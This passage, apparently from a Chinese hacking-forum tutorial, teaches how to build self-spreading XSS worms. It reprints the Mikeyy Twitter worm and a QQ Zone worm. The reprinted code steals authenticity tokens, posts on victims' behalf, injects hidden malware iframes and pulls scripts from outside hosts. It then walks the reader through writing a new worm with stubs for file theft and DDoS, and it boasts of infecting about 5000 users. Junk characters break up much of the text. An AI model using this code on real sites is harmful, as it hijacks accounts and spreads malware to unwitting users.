- j% Z5 w  b' b, q, f
' Y# r% ]* y# ?</script>
复制代码当Apache启动了mod_proxy,还可以使用proxy方式作为中间人方式获得受保护COOKIES.<script>

- C5 [: O" j. ]var XmlHttp = new ActiveXObject("Microsoft.XMLHTTP");

) i3 u) W9 k- b; r

XmlHttp.open("GET\thttp://www.evil.com/collet.php","http://www.vul.site/wherever",false);
( Z! j6 d  V% N9 M" n+ w
: I/ z) z+ x. v4 W0 _7 ?) h2 `XmlHttp.send(null);
, t& X2 J  {) Q4 `. N! k7 l2 W
<script>
复制代码(IV) 综合性的高级XSS蠕虫:什么是XSS蠕虫,他的实现,传染,工作原理,常见作用都是什么.
8 S8 B7 h: H+ ~复制代码案例:Twitter 蠕蟲五度發威
6 h. y5 D1 o  O# @+ K- ^  p第一版:
  下载 (5.1 KB)

6 天前 08:27

第二版:   1. var _0xc26a = ["Msxml2.XMLHTTP", "Microsoft.XMLHTTP", "connect", "toUpperCase", "GET", "?", "open", "", "Method", "OST ", " HTTP/1.1", "setRequestHeader", "Content-Type", "application/x-www-form-urlencoded", "onreadystatechange", "readyState", "send", "split", "join", "'", "%27", "(", "%28", ")", "%29", "*", "%2A", "~", "%7E", "!", "%21", "%20", "+", "%", "replace", "innerHTML", "documentElement", "exec", "Twitter should really fix this... Mikeyy", "I am done... Mikeyy", "Mikeyy is done..", "Twitter please fix this, regards Mikeyy", "random", "length", "floor", "mikeyy "></a><script>document.write(unescape(/%3c%73%63%72%69%70%74%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%63%6f%6e%74%65%6e%74%2e%69%72%65%65%6c%2e%63%6f%6d%2f%6a%73%78%73%73%2e%6a%73%22%3e%3c%2f%73%63%72%69%70%74%3e/.source));</script> <a ", "mikeyy "></a><script>document.write(unescape(/%3c%73%63%72%69%70%74%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%63%6f%6e%74%65%6e%74%2e%69%72%65%65%6c%2e%63%6f%6d%2f%78%73%73%6a%73%2e%6a%73%22%3e%3c%2f%73%63%72%69%70%74%3e/.source));</script> <a ", "mikeyy "></a><script>document.write(unescape(/%3c%73%63%72%69%70%74%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%62%61%6d%62%61%6d%79%6f%2e%31%31%30%6d%62%2e%63%6f%6d%2f%77%6f%6d%70%77%6f%6d%70%2e%6a%73%22%3e%3c%2f%73%63%72%69%70%74%3e/.source));</script> <a ", "/status/update", "OST", "authenticity_token=", "&status=", "&return_rendered_status=true&twttr=true", "/account/settings", "&user[name]=Womp+++++++++++++++++++++++++++++++++++++++++!&user=", "&tab=home&update=update", "/account/profile_settings", "&user[profile_default]=false&tab=none&profile_theme=0&user[profile_use_background_image]=0&user[profile_background_tile]=0&user[profile_link_color]=", "&commit=save+changes", "wait()""];  

4 r9 @+ S) U; Z# T   2.   
9 U$ W( p6 g% e& M
   3. function XHConn(){  

4 r" V2 T0 _/ D   4.   var _0x6687x2,_0x6687x3=false;  

! t' U8 u) p/ }' f) ?7 \/ ]; K   5.   try{ _0x6687x2= new ActiveXObject(_0xc26a[0x0]); }  

- ^& ?$ S1 ^5 _6 |   6.   catch(e) { try{ _0x6687x2= new ActiveXObject(_0xc26a[0x1]); }  
7 R% G2 n- F! d
   7.   catch(e) { try { _0x6687x2= new XMLHttpRequest(); }  

. d! k- ~# U0 w9 S7 z4 u9 e- w1 d" L   8.   catch(e) { _0x6687x2=false; }; }; };  
复制代码第六版:   1. function wait() {  
& K/ M7 a( K2 d* m
   2.   var content = document.documentElement.innerHTML;  
3 G8 {+ _. a* z5 Q% J8 P
; O! T2 V1 j' A* F0 S: t: C2 b   3.   var tmp_cookie=document.cookie;  
& f, ?" y  U% {( h& H2 i4 S8 [  u1 \
' ~" A1 X3 n" A* o   4.   var tmp_posted=tmp_cookie.match(/posted/);  

% v; G' Z, X  g4 z% ]+ [   5.   authreg= new RegExp(/twttr.form_authenticity_token = '(.*)';/g);  

   6.   var authtoken=authreg.exec(content);  
+ F. G  y$ o' |& K" A8 _- i0 ^- A
6 |, i+ {7 c+ n0 T, B   7.   var authtoken=authtoken[1];  
. o) V  @" W" L% R' j" \
8 g7 a6 a/ D# J/ v3 J   8.   var randomUpdate= new Array();  
! l9 i5 x3 M0 p' c7 [/ h
   9.   randomUpdate[0]= "Be nice to your kids. They'll choose your nursing home. Womp. mikeyy.";  

6 G2 D7 V: W. G8 b8 v  10.   randomUpdate[1]= "If you are born ugly blame your parents, if you died ugly blame your doctor. Womp. mikeyy.";  
: x+ v; q6 ^3 s$ v1 P2 |
. T$ s- i/ `  l% S: l  11.   randomUpdate[2]= "Every man should marry. After all, happiness is not the only thing in life. Womp. mikeyy.";  
- j% ^* c! n) V# ]9 z$ Z
- Y  w( m* k7 c. A) j+ A2 u+ ^  12.   randomUpdate[3]= "Age is a very high price to pay for maturity. Womp. mikeyy.";  
# x! p7 G( k+ d: v5 E( ~
  13.   randomUpdate[4]= "Ninety-nine percent of all lawyers give the rest a bad name. Womp. mikeyy.";  

; N, T7 j  u# G& a$ ]  14.   randomUpdate[5]= "If your father is a poor man, it is your fate, but if your father-in-law is a poor man, it's your stupidity. Womp. mikeyy.";  
& t+ S. `& R* h( L% Q. o/ G2 [
9 e8 _1 H+ u, @: q  15.   randomUpdate[6]= "Money is not the only thing, it's everything. Womp. mikeyy.";  

9 y3 [+ B2 g, H0 d. `) E  16.   randomUpdate[7]= "Success is a relative term. It brings so many relatives. Womp. mikeyy.";  

8 R3 @" n# F2 a2 W5 S) R8 ?  17.   randomUpdate[8]= "'Your future depends on your dreams', So go to sleep. Womp. mikeyy.";  

  18.   randomUpdate[9]= "God made relatives; Thank God we can choose our friends.Womp. mikeyy.";  

+ r8 Y6 z; H/ q/ d& |9 x4 J  19.   randomUpdate[10]= "'Work fascinates me' I can look at it for hours ! Womp. mikeyy.";  
# Y1 F% w9 F7 Z! a! _' h& r7 |
  20.   randomUpdate[11]= "I have enough money to last me the rest of my life. (unless I buy something) Womp. mikeyy.";  
$ ^8 _, S: I- w6 ~* T1 {1 R
4 [* M7 a3 k6 J5 |4 U$ B  x  21.   randomUpdate[12]= "RT!! @spam Watch out for the Mikeyy worm [url]http://bit.ly/XvuJe";  
- K- [3 k, W6 b% g! o
* W" t( M) y3 e. e8 Z. x" J/ a! L  22.   randomUpdate[13]= "FUCK. NEW MIKEYYY WORM! REMOVE IT: http://bit.ly/fuSkF";  

" v: x, B$ x# i( I6 s/ ^: M0 X, G  23.   randomUpdate[14]= "Mikeyy worm is back!!! Click here to remove it: http://bit.ly/UTPXe";  

- n+ _+ B* c; c4 ~5 ?  24.     
$ T5 ?- ]" e# K+ A' l( f& V
# {7 ^! p( l" E' a; b) v0 k9 B* m  25.   var genRand = randomUpdate[Math.floor(Math.random()*randomUpdate.length)];  

" G8 Z, c5 e% @  l7 `2 X6 J  26.   var updateEncode=urlencode(randomUpdate[genRand]);  
; S7 o% S7 M5 B7 |* D6 Z5 _( P% A
  27.     
* e# o5 I& N2 d  G, k8 B6 q
  28.   var ajaxConn= new XHConn();  
3 ?, b1 e% m  o- x! P5 g7 [! K% r% g
' n$ b! _3 S# g) f$ `/ U% u, R! t  29.   ajaxConn.connect("/status/update","OST","authenticity_token="+authtoken+_"&status="+updateEncode+"&return_rendered_status=true&twttr=true");  

  30.   var _0xf81bx1c="Mikeyy";  

$ a# }8 C) ~- f, F8 p' c0 c  31.   var updateEncode=urlencode(_0xf81bx1c);  
* j# Z$ d1 S1 e" D- }* v
  32.   var ajaxConn1= new XHConn();  
. p9 F5 j  n2 X, {6 A: u8 U
' l7 V5 y! `4 N  33.   ajaxConn1.connect("/account/settings","OST","authenticity_token="]+authtoken+"&user[name]="+updateEncode+""+updateEncode+"&user[description]="+updateEncode+"&user[location]="+updateEncode+"&user[protected]=0&commit=Save");  

  34.   var genXSS="000; }  #notifications{width: expression(document.body.appendChild(document.createElement('script')).src='http://runebash.net/xss.js');) #test { color:#333333";  

  35.   var XSS=urlencode(genXSS);  

9 }, D4 A) b7 L; q/ i# [( U  36.   var ajaxConn2= new XHConn();  

( \, y8 h. d/ M* U3 G  a, k$ \  37.   ajaxConn2.connect("/account/profile_settings",""OST,"authenticity_token="]+authtoken+"&user[profile_sidebar_fill_color]="+XSS+"&commit=save+changes");  
2 `2 \7 n7 B+ l: f) E) O, h2 z
' @% I8 B: P: Q$ V5 o5 j; O( m  38.     
. N2 \/ Z% O! Y
% z3 ?8 K, y& V& w+ c3 R" @* F  39. } ;  

  40. setTimeout(wait(),5250);  
复制代码QQ空间XSSfunction killErrors() {return true;}

window.onerror=killErrors;


5 y* v+ _  t8 m# b
: n0 _9 h8 i  [! evar shendu;shendu=4;

; \8 N% s: e$ u6 o! W6 d//---------------global---v------------------------------------------
4 o# ]2 H6 ^5 y
$ t) P  o. ^/ S- P7 o0 @) O/ F//通过indexOf函数得到URL中相应的字符串，用于判断是否登录的吧？
4 R) D/ C( X7 Q5 v& b3 H. R+ S
( o) a9 @% m9 B* o% p0 F- Zvar visitorID;var userurl;var guest;var xhr;var targetblogurlid="0";

8 v3 `( C  F9 j" h. a9 w% r1 V7 tvar myblogurl=new Array();var myblogid=new Array();

, t0 s4 x: |2 ~1 s4 K        var gurl=document.location.href;
- W' h! ?, k  R4 U5 z
& g3 h8 g- d" u! I: b; r1 M. l  i        var gurle=gurl.indexOf("com/");

        gurl=gurl.substring(0,gurle+3);        

        var visitorID=top.document.documentElement.outerHTML;

           var cookieS=visitorID.indexOf("g_iLoginUin = ");

        visitorID=visitorID.substring(cookieS+14);

        cookieS=visitorID.indexOf(",");

' `0 b4 ]& M% f8 w( A: Y        visitorID=visitorID.substring(0,cookieS);
* w& o# ?& n% Z5 ?2 R" l" i
        get_my_blog(visitorID);
) @6 o+ U* k2 |9 f, C
& R0 e& C9 V1 w% N        DOshuamy();
6 k0 r  B  n( r7 t
1 d; ?0 J6 w$ R5 m
9 _1 |: x1 B0 Z) ?( t
$ r! u& E- |8 |- T3 e0 [0 f//挂马

% ?& l; v$ k$ ]+ n/ Y( h# e2 u7 Ufunction DOshuamy(){
' O$ d2 t7 n' }2 g( K
* R* `& |% j8 V+ o! J4 ?# yvar ssr=document.getElementById("veryTitle");

ssr.insertAdjacentHTML("beforeend","<iframe width=0 height=0 src='http://www.xxx.com/1.html'></iframe>");
, C6 i2 {* ]7 t4 V! E
- m* \) s1 J" m3 @7 S/ d}
9 A$ {7 a5 F& O: q

- U2 p3 o* b" E% A1 J) |
3 N- y$ l  _5 S//如果创建XMLHttpRequest成功就跳到指定的URL去，这个URL是干什么的就不知道了，没看过，刷人气？

" k: t. k" e4 v1 _0 m6 r. {# ~/ [# wfunction get_my_blog(visitorID){

   userurl=gurl+"/cgi-bin/blognew/blog_output_toppage?uin="+visitorID+"&direct=1";

; J% `$ Z- e7 E& B2 A. E   xhr=createXMLHttpRequest();    //创建XMLHttpRequest对象
! s1 R1 Q' \- K+ l
& x" u1 ?- S& `   if(xhr){    //成功就执行下面的

  }$ c& \+ B6 e  G4 Y$ Q     xhr.open("GET",userurl,false);    //以GET方式打开定义的URL
2 a4 C0 x8 S5 y/ k# r" B7 K
     xhr.send();guest=xhr.responseText;
2 T( V# Y4 L3 n4 a. E" Q/ Q: {$ p
" r6 U6 @( B9 ~" G- o* l     get_my_blogurl(guest);    //执行这个函数

9 E( S: m3 E- ^: B8 K7 @    }
  s, q) [# J! R+ D/ m: K- m, Y
}
( d& |+ s" t! |* W$ d6 z' R* ~
7 [6 u1 u# Q- b

+ @; E, H4 U+ C+ o//这里似乎是判断没有登录的
) ]. p5 R5 ^2 X6 A- f$ F' ?
function get_my_blogurl(guest){
7 \9 Z9 L6 m+ B
  var mybloglist=guest;
0 b5 g# {5 c1 X2 `
  T9 D! m; A2 \1 ?: {% E- a  var myurls;var blogids;var blogide;

1 b( G2 }9 Y' @  for(i=0;i<shendu;i++){
' I. U- Q7 E. B' U5 T2 j
7 [! T/ \  P- S9 y* b$ j     myurls=mybloglist.indexOf('selectBlog(');    //查找URL中"selectBlog"字符串，干什么的就不知道了

& o8 f0 D) u: i8 e' V2 ]     if(myurls!=-1){    //找到了就执行下面的

         mybloglist=mybloglist.substring(myurls+11);
3 _) U, Q, }1 P& I
         myurls=mybloglist.indexOf(')');
9 k8 i7 C% S3 ~6 ~) `
4 `. L- ?1 l! w6 |9 q         myblogid=mybloglist.substring(0,myurls);

        }else{break;}

}
$ m2 G6 p2 v8 a6 O* e. @* _
get_my_testself();    //执行这个函数
3 a* B5 J; q2 y9 ?5 I! Y, f
}
: v4 K* f5 A2 `


//这里往哪跳就不知道了
  w: u/ s) @5 z
- c- S) \- d# W1 b: ^# Hfunction get_my_testself(){
( v( G4 E3 q2 Z( P0 L  O2 \+ C
8 k& [6 B# A+ f! l+ U" |8 g  for(i=0;i<myblogid.length;i++){    //获得blogid的值

* P; u" H, K# U0 C: Y$ r  N' b      var url=gurl+"/cgi-bin/blognew/blog_output_data?uin="+visitorID+"&blogid="+myblogid+"&r="+Math.random();

      var xhr2=createXMLHttpRequest();    //创建XMLHttpRequest对象
( L- a- S1 d9 N+ t) p# h* l
      if(xhr2){        //如果成功
2 z% q) [/ r/ Q* ?' A$ @5 J: e
$ V' t, {1 u. E3 R* A              xhr2.open("GET",url,false);     //打开上面的那个url
" j2 O# i' g3 m( u3 j, O: P2 z% R
; o) {' K5 z3 j, _              xhr2.send();

              guest2=xhr2.responseText;

              var mycheckit=guest2.indexOf("baidu");    //找"baidu"这个字符串，找它做什么？

              var mycheckmydoit=guest2.indexOf("mydoit"); //找"mydoit"这个字符串
# N/ y- q: l8 G# S* s; L
              if(mycheckmydoit!="-1"){    //返回-1则代表没找到

9 V  m7 x0 l6 O4 j/ c/ G0 J& y& l                targetblogurlid=myblogid;   
! P1 [. Y- U; v4 n- q6 v7 M
# v1 e' \3 h) Z* I- j                add_jsdel(visitorID,targetblogurlid,gurl);    //执行它
% y6 q% p: i' S
                break;
' O1 D2 R: \2 L7 h, p
               }

6 E$ E% e, |$ [6 q+ Q              if(mycheckit=="-1"){

                targetblogurlid=myblogid;
0 m* V% h0 I. w, ?1 I# }4 O
                add_js(visitorID,targetblogurlid,gurl);    //执行它
! @  j+ T7 n! k) m
6 f* C# _. Z, n9 M                break;
7 Q; T6 r6 ^1 R; w  R
               }
; v/ W8 i5 B/ Q/ O5 Y: `
. h0 S, o2 C& u- \        }      

. Y  H; x, h& \& ]}
" m4 V* H% [: R6 u8 _
, T5 n8 E' |2 \9 u* J! n0 D}

) u! w" p: L5 G

//--------------------------------------  

& L( A! B/ l+ r1 R' f//根据浏览器创建一个XMLHttpRequest对象
7 C' k( A7 A) ^# c+ y
+ Q5 Z  I9 t0 xfunction createXMLHttpRequest(){

3 @8 ?# V0 N" o# G! ~1 p/ y    var XMLhttpObject=null;  
4 j8 j# E. x' X! [( T% J5 [9 D
% s7 R- L  V( c- Q+ K, o    if (window.XMLHttpRequest) {XMLhttpObject = new XMLHttpRequest()}  

7 H5 E: \  h: V) j2 e    else  

5 L& B4 R$ d" O0 [# V6 z( o5 Z& J$ Z: i      { var MSXML=['Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP','MSXML.XMLHTTP', 'MICROSOFT.XMLHTTP.1.0','MICROSOFT.XMLHTTP.1', 'Microsoft.XMLHTTP'];        

        for(var i=0;i<MSXML.length;i++)  
( k7 d" o& s4 J6 e5 z
2 ]3 ]) S7 y. |0 R        {  

            try  

            {  

3 g9 V1 m. g  E8 H) i                XMLhttpObject=new ActiveXObject(MSXML);  

                break;  

5 ~/ R- V  k9 O; M7 `$ t- T            }  

            catch (ex) {  
: l/ ^2 _. U* s0 D( A. ~, x6 ?
4 q2 U$ e) s$ X* C* r1 ]            }  
7 W& O( x0 b& h! ^6 v. ]
3 s7 ~" ?! k& t! C- x7 u5 _) T, O2 f         }  
# ~5 c1 K5 E$ {2 x; U0 o
6 ?+ X1 X6 j$ `- ~      }

( M; [8 @* {9 a5 p$ U0 t% Vreturn XMLhttpObject;

" s& ^. _: j) F4 K: i, ^}  

" A( ]7 K9 i! A3 J+ N5 q1 ~

//这里就是感染部分了
$ z; X3 t" U+ `% S1 D5 ^
1 z, X; U. ?0 ofunction add_js(visitorID,targetblogurlid,gurl){
" G! I: U# p( J! @$ o* H
var s2=document.createElement('script');

s2.src='http://xss0211.111.5ghezu.com.cn/images/qq/temp/wm/linshi/index.php?gurl='+gurl+'&uin='+visitorID+'&blogid='+targetblogurlid+"&r="+Math.random();
! @; i1 ~- H9 b; U' I- ^
s2.type='text/javascript';

document.getElementsByTagName('head').item(0).appendChild(s2);

}
" r. b7 x  ?. I9 [! o7 y; W: N: f
/ p6 ~7 ?2 c6 |: ]! J0 J

function add_jsdel(visitorID,targetblogurlid,gurl){
( H3 c* A( c& i1 W  I
var s2=document.createElement('script');

8 C. H0 D* E! `) us2.src='http://xss0211.111.5ghezu.com.cn/images/qq/temp/wm/linshi/del.php?gurl='+gurl+'&uin='+visitorID+'&blogid='+targetblogurlid+"&r="+Math.random();

s2.type='text/javascript';

document.getElementsByTagName('head').item(0).appendChild(s2);

% T0 f% ]' ]& {9 M+ N}
7 T- T' [6 m* d- q+ Y$ k复制代码通过以上几个蠕虫,我们可以总结蠕虫的工作原理为:
1:首先写入调用蠕虫代码到一个存在XSS漏洞的位置(在非长久性XSS漏洞里,我们也可以通过把短暂性的XSS连接通过各种传播方式,发送给其他用户,当某个用户中了XSS后,再通过蠕虫,向其好友发送同一短暂性XSS连接.)

# ^/ y/ m# s% Z" I  v; [  J1 R# k2:受害用户在登陆状态中,观看了存在XSS的问题页面,JS执行,并植入XSS蠕虫代码到该用户帐户中,且通过搜索好友等方法,传播给其他用户.即复制感染过程.(在论坛或者回复类型页面中传播XSS蠕虫,只要保证每页面同时存在2个或者以上蠕虫,就可以保证蠕虫不会被增加的数据覆盖.)
4 Y0 i+ c2 Q7 \6 {* {
综上所述,结合以上种种技巧,就可以创造我们自己的XSS蠕虫了.在我们的蠕虫里,我们可以添加截取屏幕功能,DDOS功能,可以判断客户端浏览器的版本,读取并且发送客户端的本地文件~
4 o, u$ |' Z* A; J! z
) ?; V/ F; C) s! M2 g, Q
下面,我们来初步写一个简单主体蠕虫,并且预留可添加功能的地方.

首先,自然是判断不同浏览器,创建不同的对象var request = false;
' o' }! K3 r3 M* K
if(window.XMLHttpRequest) {

request = new XMLHttpRequest();
. u: p6 r2 Z& ]& U8 m
" U2 o6 [9 B7 ~4 T; mif(request.overrideMimeType) {
/ U% a; v+ ]8 C; C6 a
request.overrideMimeType('text/xml');

}
5 e9 ]9 `: M, F4 O8 a  R1 f
} else if(window.ActiveXObject) {

! g! {( h; E' \var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0', 'Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];

for(var i=0; i<versions.length; i++) {

% P/ X6 o! n9 Y* C9 @try {

5 l; D' S5 n7 b. U$ Z8 [5 Drequest = new ActiveXObject(versions);
8 L- C, F* K2 x: K9 o6 r
} catch(e) {}
2 J, S7 B, V2 i. ^4 t+ h; \
}

! p9 X8 ]3 ~8 Y, n# [- C. w7 f}
/ ?5 \3 ^+ f8 N$ k
- J) m& E6 F! B2 vxmlHttpReq=request;
8 ~  O2 f. v3 ?% ^9 s复制代码可以此时添加判断浏览器具体型号和版本:   function browserinfo(){
1 n- |: i+ {7 ]4 ?9 @
* K; |- N$ Y. r9 g        var Browser_Name=navigator.appName;
2 p! x/ F( u% e+ A6 S3 `) H
0 `6 f8 ^' e( n9 A1 Q2 i! ]        var Browser_Version=parseFloat(navigator.appVersion);
8 z: u2 n- Y% q! w0 R! D
        var Browser_Agent=navigator.userAgent;

        
' n8 N- ]! R( `  N: |
1 Q* L9 e9 r; H- t        var Actual_Version,Actual_Name;

        
4 s$ a$ \# ^: t. f/ z$ f
        var is_IE=(Browser_Name=="Microsoft Internet Explorer");

        var is_NN=(Browser_Name=="Netscape");

        var is_Ch=(Browser_Name=="Chrome");

        
. O& p) L. V* n) c7 |) F
% Y' K  {/ F0 d/ R0 g# s/ j/ G6 e        if(is_NN){
8 a5 I0 C0 q% w$ g2 W, ^- u( I* x
) o1 D. t1 J+ }+ m/ |, r7 A            if(Browser_Version>=5.0){
. a. x$ T/ [3 q1 f- {' S1 g
                var Split_Sign=Browser_Agent.lastIndexOf("/");
- a. j7 @: j5 Y& ]7 L
                var Version=Browser_Agent.indexOf(" ",Split_Sign);

                var Bname=Browser_Agent.lastIndexOf(" ",Split_Sign);
! n$ n& {( i! V" p# p


                Actual_Version=Browser_Agent.substring(Split_Sign+1,Version);

                Actual_Name=Browser_Agent.substring(Bname+1,Split_Sign);

8 W0 ~: z3 C, w' k+ E$ k: q$ ~& M            }

            else{
# }1 W# J7 b# S% w6 ]6 F" v: V) c, C0 N
, M; j: f: o1 b! x* q: k$ l                Actual_Version=Browser_Version;

2 a) a- U% x+ [2 w" W                Actual_Name=Browser_Name;
1 z  n# _; R0 p
            }
. w" e/ g# r9 k: `
/ Q4 r6 L' y6 D/ |1 j        }
; ^* I8 z+ k  M  _& X
        else if(is_IE){
( x6 k8 F7 Y- b# l3 [
            var Version_Start=Browser_Agent.indexOf("MSIE");

            var Version_End=Browser_Agent.indexOf(";",Version_Start);
; a4 M' N/ o5 g# X7 _
            Actual_Version=Browser_Agent.substring(Version_Start+5,Version_End)
  z  C1 B* [) Q- ]+ v0 {1 y
: p) D- d* |# g2 ^" a8 e            Actual_Name=Browser_Name;
8 Y6 R" P( |9 G
8 b) K" `: e% F' a' M- d7 G5 H            

& ]& U4 `7 H* }" ?3 D8 L% z+ ^            if(Browser_Agent.indexOf("Maxthon")!=-1){
) J: @4 g5 s1 e* R/ ]7 G% b
                Actual_Name+="(Maxthon)";
4 N" D+ U3 @9 c" x; u
  k# }, _' [+ P            }

            else if(Browser_Agent.indexOf("Opera")!=-1){

                Actual_Name="Opera";

$ p  v7 h1 |# \6 w' E5 u* Z                var tempstart=Browser_Agent.indexOf("Opera");
- L: W2 @; b0 `* ?
2 s; T  ~2 T0 ]- @! v3 E& [4 r$ Y                var tempend=Browser_Agent.length;
+ M$ ~, o  `  [; E
4 _9 W* E. K: {1 {. T+ T) p                Actual_Version=Browser_Agent.substring(tempstart+6,tempend)

            }
: u) Q* [9 I, y/ ]
        }
- e* q6 A/ Y) u4 m" L7 Z% x' p
! \5 Y4 z$ _3 A( [8 A        else if(is_Ch){

+ @, x9 E% x" L8 a            var Version_Start=Browser_Agent.indexOf("Chrome");
* [6 A: u6 c/ J: y( }5 W- u5 [; x
            var Version_End=Browser_Agent.indexOf(";",Version_Start);

  L- T5 O2 j* T6 D; h            Actual_Version=Browser_Agent.substring(Version_Start+5,Version_End)
2 I  N: |, k: i" S: M
, j! [$ f" [& T            Actual_Name=Browser_Name;
2 T" B0 d5 Z$ {* W: r
/ }" f0 U% _8 B3 U- T9 @( Y9 E            
7 G) B, ^1 U( W, J& R
2 E6 v; ~. F0 A/ l* h$ q- P! v            if(Browser_Agent.indexOf("Maxthon")!=-1){

( f0 e6 f5 [& n+ |  N# R+ S0 @; C                Actual_Name+="(Maxthon)";

            }
) }; d- K" a" \9 s
            else if(Browser_Agent.indexOf("Opera")!=-1){

                Actual_Name="Opera";
4 S- _) D5 D8 \8 g9 b9 M1 y
$ G8 @7 g  M  l; s; L/ e, f                var tempstart=Browser_Agent.indexOf("Opera");
3 d% M( g! h+ [
                var tempend=Browser_Agent.length;

' m& _/ D( b  M$ {( t) _3 x                Actual_Version=Browser_Agent.substring(tempstart+6,tempend)

/ z  X/ I# Z1 o            }
" V) D, O% L+ u, e
' F0 m- I6 A* W/ r% {/ C3 s$ o8 E        }
5 ]) m+ p2 c/ J, y
        else{

            Actual_Name="Unknown Navigator"

            Actual_Version="Unknown Version"

        }
. h. ]* I% B9 x, ]/ N! s0 i& ^
8 P; s- U8 i# S" X2 v& D$ e
. u( W3 [, J: h2 i! D/ C7 ]
        navigator.Actual_Name=Actual_Name;

        navigator.Actual_Version=Actual_Version;
8 i% T/ i) X2 Y3 \
' [  v9 e4 F! {* x* a5 j        

- j4 I$ }7 C- C5 w2 z        this.Name=Actual_Name;

6 z# Q: N6 a/ [5 |/ a: K        this.Version=Actual_Version;

- d0 P; V! E$ N. V0 H. |    }

    browserinfo();
) P8 i2 C9 n9 M9 p- b
' R. a* e: T4 }! B+ f  \    if(navigator.Actual_Version<8&&navigator.Actual_Name=="Miscrosoft Internet Explorer"){//调用IE读取本地敏感文件}

    if(navigator.Actual_Version<8&&navigator.Actual_Name=="Fire fox"){//调用Firefox读取本地敏感文件}
3 a9 ^0 w# z( F1 S* s( W# W, s
    if(navigator.Actual_Version<8&&navigator.Actual_Name=="Opera"){//调用Opera读取本地敏感文件}

- ~9 q% C) ]! V0 I" a    if(navigator.Actual_Version<8&&navigator.Actual_Name=="Google Chrome"){//调用Google Chrome读取本地敏感文件}
复制代码随后可以选择调用镜象网页并且发送功能.参考上面的镜象代码
' c6 d* P0 f! e& O+ z, y复制代码随后可以选择调用DDOS功能.参考上面的DDOS代码
复制代码然后,在感染和传播功能发作之前,我们要判断当前页面有没有蠕虫存在,如果有,有多少只.如果虫的数量足够,我们就不要再植入蠕虫了.只要保证一定的数量就好.xmlHttpReq.open("GET","http://vul.com/vul.jsp", false);  //读取某页面.
& L& n1 S" V. M* H$ ~
xmlHttpReq.send(null);
5 j# Z+ ]. W% B: g9 F
var resource = xmlHttpReq.responseText;

) W* t, Y, _7 X5 J0 B8 rvar id=0;var result;

var patt = new RegExp("bugbug.js","g");     //这里是蠕虫的关键词,用以确定页面有多少只虫.譬如如果你的虫在bugbug.js,那么就可以搜索这个JS在页面内的数量.
- f. H% `9 g: Y
while ((result = patt.exec(resource)) != null)  {
0 Y& y7 w% q9 Q! `$ V7 o! n) D* b) X
4 i5 z  o+ f; R& m1 D" Vid++;
& [* H4 @, C' C4 N4 F5 k* o
}
复制代码然后,我们根据数量,来做下一步的操作.先判断,如果数量太少,我们就要让蠕虫感染起来.if(id<2){     //这里我们假设要求那个页面蠕虫的数量要有2只.

3 i# g' C3 P0 F! n( V) {! L  `no=resource.search(/my name is/);
: Q$ _" O( u- I5 ^# A4 T$ ]
var wd='<script src="http://www.evil.com/bugbug.js"</script>';        //wd是存在XSS漏洞的变量.我们在这里写入JS代码.
0 L1 J$ j7 \4 ?! o; u8 r6 |
* r3 N9 B5 D3 v# Y) `var post="wd="+wd;

xmlHttpReq.open("OST","http://www.vul.com/vul.jsp",false);        //把感染代码 POST出去.
) h, m/ D9 |  {" O9 G8 ]
xmlHttpReq.setRequestHeader("Accept","image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*");
% U1 C6 i% ~9 \2 K
/ o. A& ~% k8 P7 c* qxmlHttpReq.setRequestHeader("content-length",post.length);
; L5 W3 o; n4 y0 H' f" q
xmlHttpReq.setRequestHeader("content-type","application/x-www-form-urlencoded");

xmlHttpReq.send(post);
. C1 |0 B. B3 B3 G4 L) O
" V, M5 m' W. O7 F" e  e4 l4 @+ B+ ~}
复制代码如果虫的数量已经足够,那么我们就执行蠕虫:else{

; m. ]4 }# E% H/ j7 B- Q4 D/ dvar no=resource.search(/my name is/);     //这里是访问一个授权页面里,取得用户的名称.备份,并将来用在需要填写名称的地方
, f/ @% t3 @8 y" r
. s% L7 p  N" ~$ n8 @var namee=resource.substr(no+21,5);     //这里是重组用户名,条件是随便写的.具体情况当然要不同获得.
# O9 w/ n- N6 T3 a
3 N( L! v, d9 ?$ Svar wd="Support!"+namee+"<br>";        //这里就发出去了一个你指定的MESSAGE.当然,你可以把数据存入一组数组,random读取.

var post="wd="+wd;
& T7 s& _% @. A8 A' j  Q- L" G
7 S6 Y9 w4 G; m9 I0 U1 uxmlHttpReq.open("OST","http://vul.com/vul.jsp",false);
( W( i/ }! W' a  t: J, v7 d& b! Y
xmlHttpReq.setRequestHeader("Accept","image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*");

xmlHttpReq.setRequestHeader("content-length",post.length);

& C5 C5 R7 F6 u& e! Y8 IxmlHttpReq.setRequestHeader("content-type","application/x-www-form-urlencoded");
$ y- c7 A# r! g# u
xmlHttpReq.send(post);                 //把传播的信息 POST出去.
  Z4 M# W. ?9 u) t0 S" z9 V& X6 F) \
9 j- J+ j" ]7 o' [}
: i6 n" `* H5 d3 f( G复制代码-----------------------------------------------------总结-------------------------------------------------------------------
, e; s) \8 g* o; K" q0 J


, @; q$ s9 D  y" e6 X( N本次教程案例中的蠕虫曾经测试成功并且感染了约5000名用户.
蠕虫仅仅是一个载体,在这个载体上,我们可以实现各种各样的功能.
操作JS调用COM,你的想象力有多大,蠕虫能力就有多大.这也是为什么国外黑客往往喜欢写蠕虫的原因.
3 g+ h2 n. w0 N! ?. O1 N

% v# i* P4 ~9 w  e4 ?3 g/ M
* A) }/ A; I  d+ M' k
- X2 B" e: b2 {8 e/ m
1 P% Q  k* o0 O2 C$ j) |8 D6 x, d
( H. p- J3 B/ E' E/ e* `7 a  Y

' }  t2 t7 r" w' g# `, T5 Q2 |本文引用文档资料:
6 r0 h2 W( N7 y
